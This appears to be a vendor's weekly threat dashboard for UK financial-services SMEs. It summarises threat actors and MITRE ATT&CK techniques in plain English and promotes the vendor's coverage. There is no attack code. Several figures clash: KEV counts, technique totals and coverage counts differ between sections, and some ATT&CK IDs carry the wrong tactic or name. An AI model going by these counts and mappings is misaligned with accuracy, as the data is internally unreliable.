MITRE ATT&CK SME Edition ● Live

MITRE-Lite Threat Dashboard

The full MITRE ATT&CK framework covers thousands of attack techniques used by nation-states and sophisticated criminal groups. This dashboard cuts it down to the techniques that are actually being used against UK SMEs and financial services firms — right now — in plain English.

█ Last updated: 2 June 2026  ·  Week 23 / 2026

NCSC feed: current CISA KEV: current Actor profiles: weekly review

Refreshed every Monday. Next update: 9 June 2026.

Threat Landscape

Active Threat Actors Targeting UK Financial Services

7
Active Threat Actor Groups
Confirmed targeting UK fin. services SMEs
14
Techniques in Active Use
From SME-relevant ATT&CK subset
3
New Techniques This Week
Added since last Monday's refresh
11
CISA KEV Entries
Mapped to broker-relevant techniques — 8 Critical, 3 High
What is MITRE ATT&CK? It's a publicly-maintained library of every known attack technique used by criminal groups and state-sponsored hackers — think of it as a documented playbook of everything attackers try. This dashboard filters it down to the techniques that realistically threaten businesses like yours: small financial services firms, insurance brokers, and professional services companies in the UK.
Actor / Group Origin Primary Method Active Techniques (ATT&CK IDs) SME Risk
Scattered Spider
aka UNC3944, Octo Tempest
 CYBERCRIME SIM-swapping and social engineering to bypass MFA; targets IT helpdesks to gain access. T1078 T1566.001 T1621 HIGH
ALPHV / BlackCat
Ransomware-as-a-Service group
 CYBERCRIME Ransomware deployment following stolen credentials and VPN exploitation. Known to target professional services firms. T1486 T1190 T1657 HIGH
APT29 / Cozy Bear
SVR, Russian Foreign Intelligence
 RUSSIA / STATE Spearphishing and supply chain compromise. Primarily targets government and finance. Sophisticated, long-dwell operations. T1566.002 T1195 T1071.001 MEDIUM
APT40 / BRONZE MOHAWK
Chinese MSS-linked group
 CHINA / STATE Exploitation of internet-facing services and VPNs. Actively targeting financial data and intellectual property. T1190 T1133 T1041 MEDIUM
MuddyWater
STATIC KITTEN, Iranian MOIS
 IRAN / STATE Phishing and exploitation of web frameworks (Laravel, Zimbra). Targeting professional services and finance for espionage. T1566.001 T1190 T1059 MEDIUM
LockBit 3.0 Affiliates
Ransomware-as-a-Service network
 CYBERCRIME Access brokers sell network entry to affiliates who then deploy LockBit ransomware. SMEs frequently targeted as easier entry points. T1486 T1078 T1083 HIGH
TA4903 (BEC Specialists)
Business Email Compromise group
 CYBERCRIME Impersonation of senior staff, solicitors, and payment processors to redirect bank transfers. Primary threat vector for insurance brokers. T1566.002 T1534 T1078 HIGH
Coverage Metrics

How Much of This Does GET-IT Cover?

9
Techniques Covered
GET-IT stack addresses these directly
64%
Coverage Rate
Of the 14 active techniques this week
5
Uncovered Techniques
Honest gap — not covered by current stack
Partial
Exfiltration Coverage
Monitoring detects data movement; cannot always block it
We show you the gaps honestly. No security provider covers everything. The 5 uncovered techniques below include areas where mitigations depend on human behaviour (staff training) or third-party dependencies (your cloud provider, your line-of-business software vendor). We flag them so you know what to ask about — and so you can factor them into cyber insurance conversations.

Coverage by Tactic

Initial Access
75% 3 of 4 techs
Execution
80% 4 of 5 techs
Persistence
67% 2 of 3 techs
Lateral Movement
50% 1 of 2 techs
Exfiltration
33% 1 of 3 techs
Impact
100% 3 of 3 techs
Exfiltration gap — what this means for your insurance: If an attacker reaches your data and moves it slowly out via legitimate cloud services (Microsoft OneDrive, SharePoint, or email), detection requires behavioural monitoring that goes beyond standard endpoint protection. Many cyber insurance policies include data exfiltration in their coverage — but only where you can demonstrate attempted prevention. Speak to us if this concerns you.
Active Techniques

Techniques in Use Against UK SMEs This Week

T1566.001 · T1566.002
Phishing — Email & Link-based
Attackers send fake emails pretending to be HMRC, your bank, a solicitor, or a trusted supplier. The email contains a malicious attachment or a link to a fake login page designed to steal your password.
Initial Access ✓ Covered
T1190
Exploit Public-Facing Application
Attackers search for unpatched software on your internet-facing systems — VPNs, firewalls, web apps — and exploit known security holes to get in. This is the entry point for many ransomware campaigns. This week: Palo Alto PAN-OS VPN bypass (CVE-2026-0257) confirmed actively exploited.
Initial Access ● Partial ▲ CRITICAL
T1078
Valid Accounts (Stolen Credentials)
An attacker who has obtained a username and password (from a previous breach, phishing, or the dark web) simply logs in using legitimate credentials. No hacking required — they look like a real user.
Initial Access ✓ Covered
T1059
Command-Line Scripting (PowerShell / cmd)
Once inside, attackers use built-in Windows tools (PowerShell, command prompt) to run malicious commands without installing suspicious software. This makes them harder to detect because they're using your own tools against you.
Execution ✓ Covered
T1621
MFA Fatigue Attack
An attacker who has your password sends dozens of multi-factor authentication (MFA) push notifications to your phone, hoping you'll accidentally approve one — or approve it just to make the alerts stop. This bypasses MFA entirely.
Execution ● Partial
T1598.003
Messaging App Targeting (Spearphishing via Service)
Attackers harvest WhatsApp, Signal, and LinkedIn accounts of senior staff to build social engineering profiles — then impersonate trusted contacts to extract credentials or authorise fraudulent payments. NCSC issued a specific warning this week.
Initial Access ✗ Gap NEW
T1133
External Remote Services (VPN Abuse)
Attackers exploit or abuse your VPN, remote desktop (RDP), or remote access tools to maintain persistent access — often long after the initial breach is discovered. They effectively install a back door.
Persistence ● Partial
T1534
Internal Spearphishing
Having compromised one email account, attackers use it to send convincing phishing emails to other staff internally. A message appearing to come from your MD or finance director asking to approve an urgent payment.
Lateral Movement ✗ Gap NEW
T1041 · T1567
Data Exfiltration via Cloud Services
Attackers copy your files out through legitimate cloud services — SharePoint, OneDrive, Dropbox, Google Drive — because this traffic looks normal to most security tools. Data is gone before anyone notices.
Exfiltration ✗ Gap
T1486
Data Encryption for Ransom
The final step in most ransomware attacks — all your files are encrypted and you're locked out of your own systems. A ransom demand follows. UK SMEs paid an average of £47,000 per incident in 2025, with recovery taking 3–4 weeks.
Impact ✓ Covered
T1657
Financial Theft (Business Email Compromise)
An attacker with access to a business email account monitors payment conversations and intercepts at the right moment — substituting their own bank account details. The #1 financial loss vector for UK insurance brokers and professional services firms.
Impact ● Partial
Threat Severity

Current Risk Status for UK Financial Services SMEs

█ THREAT LEVEL: ELEVATED

Sustained High-Activity Period — Financial Services Sector

NCSC and industry sources indicate continued elevated threat activity targeting UK professional services and financial sector SMEs. BEC attacks on insurance brokers are up approximately 34% year-on-year. Ransomware affiliate groups continue to prioritise SME targets identified as having weaker controls than enterprise counterparts. No specific imminent threat to a named organisation — but the baseline risk for this sector remains above normal.

► Highest Severity Active Technique — Week 23 / 2026

VPN Authentication Bypass (T1190) — Palo Alto PAN-OS Critical Vulnerability

CISA added CVE-2026-0257 to its Known Exploited Vulnerabilities catalog on 29 May 2026 — a critical authentication bypass in Palo Alto Networks PAN-OS that allows attackers to establish an unauthorised VPN connection without valid credentials. If your business uses Palo Alto firewalls or VPN appliances and has not patched in the past week, treat this as urgent. Ransomware affiliate groups actively use VPN bypass as their primary initial access technique against UK SMEs. NCSC separately issued a warning this week on messaging app targeting — WhatsApp and Signal accounts of senior staff and executives are being actively harvested to build convincing social engineering profiles prior to BEC attacks.

🔒
█ Ransomware Activity Indicator

ACTIVE — LockBit 3.0 Affiliates and ALPHV/BlackCat Successors Operational

Both ransomware-as-a-service ecosystems remain active with affiliate networks continuing to acquire access from initial access brokers. UK professional services firms make up approximately 18% of confirmed UK ransomware victims in Q1 2026 (NCSC data). Offline backups, patching cadence, and tested recovery plans are the three most effective mitigations at this level.

Intelligence Feed

Live Source Summary

■ NCSC UK Alerts
7
Active NCSC advisories relevant to UK SME and financial services environments. Includes new warning on messaging app targeting and Russian military router hijacking.
Latest: 31 May 2026  →  View NCSC →
■ CISA KEV Entries (SME-Relevant)
12
Known-exploited vulnerabilities mapped to software commonly used by UK SMEs. New critical entry: Palo Alto PAN-OS authentication bypass (CVE-2026-0257).
Latest: 29 May 2026  →  View CISA KEV →
■ Top Sector Affected This Week
Finance & Insurance
FCA press release confirms 49% of young drivers have purchased insurance via social media or messaging apps — unauthorised firms operating at scale. Insurance brokers are primary targets for BEC this week.
FCA ScamSmart updated: 28 May 2026  →  View →
Full Advisory Detail
For full advisory detail, vulnerability write-ups, and CISA KEV entries see the Threat Advisory page →
Has Your Email Been Breached?
Check whether your business email appears in known breach databases — Free check →

Does Your Security Stack Cover These Techniques?

64% coverage of active techniques is a starting point. If you'd like to understand exactly where your gaps are — and what it would cost to close them — book a resilience scan.

Book a Resilience Scan →

Intelligence sourced from NCSC UK, the CISA Known Exploited Vulnerabilities Catalog, FCA ScamSmart, and the MITRE ATT&CK framework (licensed under CC BY 4.0). Technique descriptions are plain-English interpretations for SME audiences and are not verbatim reproductions of MITRE documentation. Coverage assessments reflect the GET-IT stack as configured for a typical SME client — actual coverage depends on your specific environment. This dashboard is updated weekly; data may not reflect events in the 24–48 hours prior to the last refresh date. GET-IT Solutions Ltd is not responsible for inaccuracies in third-party source data.